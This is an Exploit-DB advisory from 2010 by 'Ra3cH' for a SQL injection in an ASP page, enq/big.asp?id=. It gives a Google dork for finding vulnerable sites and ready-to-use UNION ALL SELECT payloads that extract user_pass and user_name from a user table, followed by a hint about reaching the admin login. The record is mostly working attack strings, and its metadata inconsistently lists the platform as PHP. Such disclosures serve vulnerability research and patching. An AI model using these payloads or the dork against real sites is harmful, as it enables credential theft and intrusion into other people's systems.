big.asp - SQL Injection Vulnerability

2010-05-08T00:00:00
ID EDB-ID:12533
Type exploitdb
Reporter Ra3cH
Modified 2010-05-08T00:00:00

Description

(big.asp) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            *******************************************************************************
# Author   : Ra3cH
# Price    : N/A
# Title    : (big.asp) SQL Injection Vulnerability
# Site     : www.dz4all.com/cc
# Dork     : inurl:enq/big.asp?id=
# Risk     : High
*
**Vulnerable script: enq/big.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/enq/big.asp?id=  [SQL Inject]
*
*
**Exploit:
*
*
**-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1
*
*
**Exemple:
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
*
**or
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
*
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &